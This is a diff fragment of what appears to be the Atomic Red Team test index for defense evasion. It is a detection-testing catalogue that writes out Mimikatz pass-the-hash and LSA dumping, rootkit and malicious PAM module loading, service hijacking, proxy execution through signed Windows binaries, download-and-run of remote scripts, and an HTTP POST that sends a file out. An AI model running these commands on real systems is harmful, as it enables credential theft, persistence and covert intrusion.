'msiexec.exe /q /i "#{msi_payload}" -' + ' name: command_prompt - name: Msiexec.exe - Execute Arbitrary DLL auto_generated_guid: 66f64bd5-7c35-4c24-953a-04ca30a0a0ec @@ -31743,17 +31743,17 @@ defense-evasion: dependencies: - description: 'T1218.dll must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: command: 'msiexec.exe /y "#{dll_payload}" -' + ' name: command_prompt T1564.004: technique: 
@@ -31893,7 +31893,7 @@ defense-evasion: Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`"" cleanup_command: 'Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore -' + ' name: powershell - name: Create ADS command prompt auto_generated_guid: 17e7637a-ddaf-4a82-8622-377e20de8fdb @@ -31917,7 +31917,7 @@ defense-evasion: for /f "usebackq delims=?" %i in (#{file_name}:#{ads_filename}) do %i cleanup_command: 'del #{file_name} >nul 2>&1 -' + ' name: command_prompt - name: Create ADS PowerShell auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 @@ -31939,13 +31939,13 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_name}) -' + ' prereq_command: 'if (Test-Path #{file_name}) { exit 0 } else { exit 1 } -' + ' get_prereq_command: 'New-Item -Path #{file_name} | Out-Null -' + ' executor: command: | echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test" @@ -31953,7 +31953,7 @@ defense-evasion: set-content -path . -stream #{ads_filename} -value "test3" cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore -' + ' name: powershell T1599.001: technique: @@ -32162,7 +32162,7 @@ defense-evasion: auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131 description: 'Add a Network Share utilizing the command_prompt -' + ' supported_platforms: - windows input_arguments: @@ -32179,7 +32179,7 @@ defense-evasion: auto_generated_guid: '09210ad5-1ef2-4077-9ad3-7351e13e9222' description: 'Removes a Network Share utilizing the command_prompt -' + ' supported_platforms: - windows input_arguments: 
@@ -32190,13 +32190,13 @@ defense-evasion: executor: command: 'net share #{share_name} /delete -' + ' name: command_prompt - name: Remove Network Share PowerShell auto_generated_guid: 0512d214-9512-4d22-bde7-f37e058259b3 description: 'Removes a Network Share utilizing PowerShell -' + ' supported_platforms: - windows input_arguments: @@ -32443,14 +32443,14 @@ defense-evasion: cleanup_command: 'Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage} -' + ' name: powershell - name: Execution from Compressed File auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f description: 'Mimic execution of compressed executable. When successfully executed, calculator.exe will open. -' + ' supported_platforms: - windows input_arguments: @@ -32462,11 +32462,11 @@ defense-evasion: dependencies: - description: 'T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe -' + ' prereq_command: 'if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027.zip" @@ -32474,7 +32474,7 @@ defense-evasion: executor: command: '"%temp%\temp_T1027.zip\T1027.exe" -' + ' cleanup_command: | taskkill /f /im calculator.exe >nul 2>nul rmdir /S /Q %temp%\temp_T1027.zip >nul 2>nul @@ -32508,7 +32508,7 @@ defense-evasion: command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test'' -Attachments #{input_file} -SmtpServer #{smtp_server} -' + ' name: powershell - name: DLP Evasion via Sensitive Data in VBA Macro over HTTP auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319 @@ -32529,7 +32529,7 @@ defense-evasion: executor: command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} -' + ' name: powershell - name: Obfuscated Command in PowerShell auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f 
@@ -32537,7 +32537,7 @@ defense-evasion: "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. -' + ' supported_platforms: - windows executor: @@ -32548,7 +32548,7 @@ defense-evasion: 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .(''%'') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) -' + ' name: powershell - name: Obfuscated Command Line using special Unicode characters auto_generated_guid: e68b945c-52d0-4dd9-a5e8-d173d70c448f @@ -32646,7 +32646,7 @@ defense-evasion: auto_generated_guid: 2430498b-06c0-4b92-a448-8ad263c388e2 description: 'Execute arbitrary DLL file stored locally. -' + ' supported_platforms: - windows input_arguments: @@ -32658,17 +32658,17 @@ defense-evasion: dependencies: - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"} -' + ' name: command_prompt T1134.004: technique: @@ -32781,10 +32781,10 @@ defense-evasion: dependencies: - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) -' + ' prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" 
@@ -32825,7 +32825,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}'' -ParentId #{parent_pid}' @@ -32854,7 +32854,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}' @@ -32884,7 +32884,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | @@ -32920,7 +32920,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}''' @@ -33005,7 +33005,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -33020,13 +33020,13 @@ defense-evasion: command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}" -' + ' name: command_prompt - name: crackmapexec Pass the Hash auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 description: 'command execute with crackmapexec -' + ' supported_platforms: - windows input_arguments: 
@@ -33055,14 +33055,14 @@ defense-evasion: - description: 'CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) -' + ' prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} -' + ' executor: command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n" name: command_prompt @@ -33143,7 +33143,7 @@ defense-evasion: auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 description: 'Similar to PTH, but attacking Kerberos -' + ' supported_platforms: - windows input_arguments: @@ -33151,7 +33151,7 @@ defense-evasion: description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) type: String - default: + default: mimikatz_exe: description: Path of the Mimikatz binary type: Path @@ -33160,10 +33160,10 @@ defense-evasion: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) -' + ' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -33174,7 +33174,7 @@ defense-evasion: executor: command: '#{mimikatz_exe} "kerberos::ptt #{ticket}" -' + ' name: command_prompt - name: Rubeus Kerberos Pass The Ticket auto_generated_guid: a2fc4ec5-12c6-4fb4-b661-961f23f359cb 
@@ -33217,19 +33217,19 @@ defense-evasion: dependencies: - description: 'Rubeus must exist on disk at specified location (#{rubeus_path}) -' + ' prereq_command: 'if (Test-Path #{rubeus_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path} -' + ' - description: 'PsExec must exist on disk at specified location (#{psexec_path}) -' + ' prereq_command: 'if (Test-Path #{psexec_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -33312,7 +33312,7 @@ defense-evasion: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. -' + ' supported_platforms: - windows input_arguments: @@ -33325,14 +33325,14 @@ defense-evasion: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) -' + ' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host "You must provide your own password filter dll" -' + ' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -33754,10 +33754,10 @@ defense-evasion: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | 
@@ -33791,35 +33791,35 @@ defense-evasion: - description: 'The PAM development library must be installed to build the PAM module -' + ' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi -' + ' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) -' + ' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} -' + ' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' T1205.001: technique: external_references: @@ -34256,13 +34256,13 @@ defense-evasion: cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore -' + ' name: powershell - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process -' + ' supported_platforms: - windows input_arguments: @@ -34274,7 +34274,7 @@ defense-evasion: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -34285,7 +34285,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" 
@@ -34408,7 +34408,7 @@ defense-evasion: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed -' + ' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -34419,7 +34419,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -34454,7 +34454,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -34469,10 +34469,10 @@ defense-evasion: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) -' + ' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" @@ -34483,7 +34483,7 @@ defense-evasion: command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" -' + ' name: command_prompt elevation_required: false T1055.008: @@ -34618,7 +34618,7 @@ defense-evasion: description: 'Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload. -' + ' supported_platforms: - windows input_arguments: @@ -34630,7 +34630,7 @@ defense-evasion: command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}" -' + ' name: command_prompt T1542.004: technique: 
@@ -34853,7 +34853,7 @@ defense-evasion: description: 'Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn''t really execute either." will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -34870,10 +34870,10 @@ defense-evasion: - description: 'The CSharp source file must exist on disk at specified location (#{source_file}) -' + ' prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}" @@ -34883,7 +34883,7 @@ defense-evasion: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file} cleanup_command: 'del #{output_file} >nul 2>&1 -' + ' name: command_prompt - name: Regsvcs Uninstall Method Call Test auto_generated_guid: fd3c1c6a-02d2-4b72-82d9-71c527abb126 @@ -34906,10 +34906,10 @@ defense-evasion: - description: 'The CSharp source file must exist on disk at specified location (#{source_file}) -' + ' prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}" @@ -34998,7 +34998,7 @@ defense-evasion: description: 'Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. -' + ' supported_platforms: - windows input_arguments: 
@@ -35018,10 +35018,10 @@ defense-evasion: dependencies: - description: 'Regsvr32.sct must exist on disk at specified location (#(unknown)) -' + ' prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct" -OutFile "#(unknown)" @@ -35056,7 +35056,7 @@ defense-evasion: description: 'Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. -' + ' supported_platforms: - windows input_arguments: @@ -35077,10 +35077,10 @@ defense-evasion: - description: 'AllTheThingsx86.dll must exist on disk at specified location (#{dll_name}) -' + ' prereq_command: 'if (Test-Path #{dll_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" @@ -35088,14 +35088,14 @@ defense-evasion: command: 'IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}\#{regsvr32name} /s #{dll_name} ) -' + ' name: command_prompt - name: Regsvr32 Registering Non DLL auto_generated_guid: 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 description: 'Replicating observed Gozi maldoc behavior registering a dll with an altered extension -' + ' supported_platforms: - windows input_arguments: @@ -35115,13 +35115,13 @@ defense-evasion: dependencies: - description: 'Test requires a renamed dll file -' + ' prereq_command: 'if exist #{dll_file} ( exit 0 ) else ( exit 1 ) -' + ' get_prereq_command: 'copy "C:\Windows\System32\shell32.dll" "#{dll_file}" -' + ' executor: name: command_prompt elevation_required: false 
@@ -35237,7 +35237,7 @@ defense-evasion: %SystemRoot%\Temp\lsass.exe /B cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 -' + ' name: command_prompt - name: Masquerading as Linux crond process. auto_generated_guid: a315bfff-7a98-403b-b442-2ea1b255e556 @@ -35253,7 +35253,7 @@ defense-evasion: echo 'sleep 5' | /tmp/crond cleanup_command: 'rm /tmp/crond -' + ' name: sh - name: Masquerading - cscript.exe running as notepad.exe auto_generated_guid: 3a2a578b-0a01-46e4-92e3-62e2859b42f0 @@ -35269,7 +35269,7 @@ defense-evasion: cmd.exe /c %APPDATA%\notepad.exe /B cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1 -' + ' name: command_prompt - name: Masquerading - wscript.exe running as svchost.exe auto_generated_guid: 24136435-c91a-4ede-9da1-8b284a1c1a23 @@ -35285,7 +35285,7 @@ defense-evasion: cmd.exe /c %APPDATA%\svchost.exe /B cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1 -' + ' name: command_prompt - name: Masquerading - powershell.exe running as taskhostw.exe auto_generated_guid: ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa @@ -35301,7 +35301,7 @@ defense-evasion: cmd.exe /K %APPDATA%\taskhostw.exe cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1 -' + ' name: command_prompt - name: Masquerading - non-windows exe running as windows exe auto_generated_guid: bc15c13f-d121-4b1f-8c7d-28d95854d086 @@ -35324,10 +35324,10 @@ defense-evasion: dependencies: - description: 'Exe file to copy must exist on disk at specified location (#{inputfile}) -' + ' prereq_command: 'if (Test-Path #{inputfile}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/bin/T1036.003.exe" -OutFile "#{inputfile}" 
@@ -35338,14 +35338,14 @@ defense-evasion: Stop-Process -ID $myT1036_003 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore -' + ' name: powershell - name: Masquerading - windows exe running as different windows exe auto_generated_guid: c3d24a39-2bfe-4c6a-b064-90cd73896cb0 description: 'Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe -' + ' supported_platforms: - windows input_arguments: @@ -35364,7 +35364,7 @@ defense-evasion: Stop-Process -ID $myT1036_003 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore -' + ' name: powershell - name: Malicious process Masquerading as LSM.exe auto_generated_guid: 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f @@ -35646,7 +35646,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -35660,10 +35660,10 @@ defense-evasion: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) -' + ' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -35696,7 +35696,7 @@ defense-evasion: Write-Host "End of DCShadow" cleanup_command: 'Stop-Process -Name "mimikatz" -Force -ErrorAction Ignore -' + ' T1014: technique: id: attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b @@ -35774,7 +35774,7 @@ defense-evasion: auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553 description: 'Loadable Kernel Module based Rootkit -' + ' supported_platforms: - linux input_arguments: 
@@ -35799,10 +35799,10 @@ defense-evasion: dependencies: - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}) -' + ' prereq_command: 'if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{rootkit_source_path}/* #{temp_folder}/ @@ -35812,17 +35812,17 @@ defense-evasion: executor: command: 'sudo insmod #{rootkit_path} -' + ' cleanup_command: 'sudo rmmod #{rootkit_name} -' + ' name: sh elevation_required: true - name: Loadable Kernel Module based Rootkit auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f description: 'Loadable Kernel Module based Rootkit -' + ' supported_platforms: - linux input_arguments: @@ -35847,11 +35847,11 @@ defense-evasion: dependencies: - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}) -' + ' prereq_command: 'if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: "if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;\ncp #{rootkit_source_path}/* #{temp_folder}/\ncd #{temp_folder}; make \nsudo cp #{temp_folder}/#{rootkit_name}.ko @@ -35860,7 +35860,7 @@ defense-evasion: executor: command: 'sudo modprobe #{rootkit_name} -' + ' cleanup_command: | sudo modprobe -r #{rootkit_name} sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko @@ -35990,7 +35990,7 @@ defense-evasion: description: 'Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. -' + ' supported_platforms: - windows input_arguments: @@ -36001,7 +36001,7 @@ defense-evasion: executor: command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); -' + ' name: command_prompt - name: Rundll32 execute VBscript command auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb 
@@ -36019,7 +36019,7 @@ defense-evasion: executor: command: 'rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0) -' + ' name: command_prompt - name: Rundll32 advpack.dll Execution auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89 @@ -36038,17 +36038,17 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}" executor: command: 'rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, -' + ' name: command_prompt - name: Rundll32 ieadvpack.dll Execution auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9 @@ -36068,17 +36068,17 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}" executor: command: 'rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, -' + ' name: command_prompt - name: Rundll32 syssetup.dll Execution auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125 
@@ -36097,10 +36097,10 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}" @@ -36108,7 +36108,7 @@ defense-evasion: command: 'rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute} -' + ' name: command_prompt - name: Rundll32 setupapi.dll Execution auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19 @@ -36127,10 +36127,10 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}" @@ -36138,7 +36138,7 @@ defense-evasion: command: 'rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execute} -' + ' name: command_prompt - name: Execution of HTA and VBS Files using Rundll32 and URL.dll auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3 @@ -36161,7 +36161,7 @@ defense-evasion: description: 'Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable. -' + ' supported_platforms: - windows input_arguments: @@ -36172,7 +36172,7 @@ defense-evasion: executor: command: 'rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch} -' + ' name: command_prompt T1134.005: technique: 
@@ -36571,7 +36571,7 @@ defense-evasion: description: 'Change Service registry ImagePath of a bengin service to a malicious file -' + ' supported_platforms: - windows input_arguments: @@ -36591,22 +36591,22 @@ defense-evasion: dependencies: - description: 'The service must exist (#{weak_service_name}) -' + ' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" -' + ' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" -' + ' cleanup_command: 'sc.exe delete #{weak_service_name} -' + ' name: command_prompt T1548.001: technique: @@ -36662,7 +36662,7 @@ defense-evasion: description: 'Make, change owner, and change file attributes on a C source code file -' + ' supported_platforms: - macos - linux @@ -36688,7 +36688,7 @@ defense-evasion: auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in Linux and macOS. -' + ' supported_platforms: - macos - linux @@ -36704,14 +36704,14 @@ defense-evasion: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} -' + ' name: sh elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. -' + ' supported_platforms: - macos - linux @@ -36727,7 +36727,7 @@ defense-evasion: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} -' + ' name: sh elevation_required: true - name: Make and modify capabilities of a binary @@ -36759,7 +36759,7 @@ defense-evasion: description: 'This test gives a file the capability to set UID without using flags. -' + ' supported_platforms: - linux input_arguments: 
